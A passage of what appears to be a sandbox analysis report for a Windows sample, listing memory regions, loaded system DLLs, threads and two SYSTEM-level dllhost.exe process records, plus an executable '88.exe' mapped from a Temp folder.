end_va = 0x1da0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 4623 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 4624 start_va = 0x2710000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 4625 start_va = 0x1e40000 end_va = 0x1e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 4626 start_va = 0x1ed0000 end_va = 0x1ed2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 4627 start_va = 0x1ee0000 end_va = 0x1ee2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 4628 start_va = 0x3210000 end_va = 0x4564fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 4629 start_va = 0x1e30000 end_va = 0x1e30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 4630 start_va = 0x1ed0000 end_va = 0x1ed0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 4631 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4632 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4633 start_va = 0x7fef8620000 end_va = 0x7fef865afff monitored = 0 entry_point = 0x7fef8647600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 4634 start_va = 0x741a0000 end_va = 0x741a5fff monitored = 0 entry_point = 0x741a1010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 4635 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 4636 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 4637 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4638 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4639 start_va = 0x1ee0000 end_va = 0x1eecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 4640 start_va = 0x1ef0000 end_va = 0x1ef0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 4641 start_va = 0x2350000 end_va = 0x2350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 4642 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 4643 start_va = 0x24a0000 end_va = 0x24a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 4644 start_va = 0x2510000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 4645 start_va = 0x4570000 end_va = 0x4972fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 4646 start_va = 0x7fef85b0000 end_va = 0x7fef85b9fff monitored = 0 entry_point = 0x7fef85b49f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 4647 start_va = 0x7fef8590000 end_va = 0x7fef85a7fff monitored = 0 entry_point = 0x7fef8591060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 4648 start_va = 0x7fef8580000 end_va = 0x7fef8588fff monitored = 0 entry_point = 0x7fef8582f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 4649 start_va = 0x4b00000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 4650 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4651 start_va = 0x24b0000 end_va = 0x24b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 4652 start_va = 0x24b0000 end_va = 0x24b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 4653 start_va = 0x24c0000 end_va = 0x24c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 4654 start_va = 0x4c50000 end_va = 0x4ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 4655 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4656 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 4657 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 4658 start_va = 0x4cd0000 end_va = 0x4eb7fff monitored = 1 entry_point = 0x4cd31a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4659 start_va = 0x1cd0000 end_va = 0x1cd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 4660 start_va = 0x1cd0000 end_va = 0x1cd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cd0000" filename = "" Thread: id = 169 os_tid = 0xf80 Thread: id = 170 os_tid = 0xf8c Thread: id = 171 os_tid = 0xf90 Thread: id = 172 os_tid = 0xf94 Thread: id = 173 os_tid = 0xf98 Thread: id = 174 os_tid = 0xfa0 Thread: id = 179 os_tid = 0xff8 Thread: id = 180 os_tid = 0x8a0 Thread: id = 181 os_tid = 0x488 Thread: id = 182 os_tid = 0xc38 Thread: id = 184 os_tid = 0xc3c Thread: id = 185 os_tid = 0xb54 Process: id = "15" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x76dd9000" os_pid = "0xb50" os_integrity_level = "0x4000" os_privileges = "0x20860080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4665 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4666 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4667 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4668 start_va = 0x40000 end_va = 0xa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4669 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4670 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4671 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4672 start_va = 0x110000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4673 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4674 start_va = 0x3e0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 4675 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 4676 start_va = 0x530000 end_va = 0x6b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4677 start_va = 0x6c0000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 4678 start_va = 0x850000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 4679 start_va = 0x1c50000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 4680 start_va = 0x1d70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 4681 start_va = 0x1e80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4682 start_va = 0x1f80000 end_va = 0x224efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4683 start_va = 0x22f0000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 4684 start_va = 0x23b0000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 4685 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 4686 start_va = 0x2660000 end_va = 0x273efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 4687 start_va = 0x2740000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 4688 start_va = 0x2920000 end_va = 0x292ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 4689 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4690 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4691 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4692 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4693 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4694 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4695 start_va = 0xffcd0000 end_va = 0xffcd6fff monitored = 0 entry_point = 0xffcd124c region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 4696 start_va = 0x7fef2610000 end_va = 0x7fef26affff monitored = 0 entry_point = 0x7fef268eb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 4697 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4698 start_va = 0x7fefc220000 end_va = 0x7fefc243fff monitored = 0 entry_point = 0x7fefc221024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 4699 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4700 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4701 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4702 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4703 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4704 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4705 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4706 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4707 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4708 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4709 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4710 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4711 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4712 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4713 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4714 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4715 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4716 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4717 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4718 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4719 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4720 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4721 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4722 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4723 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4724 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4725 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 4726 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4727 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4728 start_va = 0x7fef84a0000 end_va = 0x7fef84b1fff monitored = 0 entry_point = 0x7fef84a101c region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 187 os_tid = 0xb44 Thread: id = 188 os_tid = 0x55c Thread: id = 189 os_tid = 0x438 Thread: id = 190 os_tid = 0x46c Thread: id = 191 os_tid = 0x7ac Thread: id = 192 os_tid = 0x404 Thread: id = 193 os_tid = 0xb48 Process: id = "16" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x66ab4000" os_pid = "0x704" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4729 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4730 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4731 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4732 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 4733 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4734 start_va = 0x150000 end_va = 0x1b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4735 start_va = 0x1c0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4736 start_va = 0x2c0000 end_va = 0x2c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 4737 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 4738 start_va = 0x310000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4739 start_va = 0x320000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4740 start_va = 0x420000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 4741 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4742 start_va = 0x590000 end_va = 0x717fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 4743 start_va = 0x720000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 4744 start_va = 0x8d0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 4745 start_va = 0x9f0000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 4746 start_va = 0xba0000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 4747 start_va = 0xca0000 end_va = 0xf6efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4748 start_va = 0xfb0000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 4749 start_va = 0x10d0000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 4750 start_va = 0x11d0000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 4751 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4752 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4753 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4754 start_va = 0x7efe0000 end_va = 0x7f0dffff 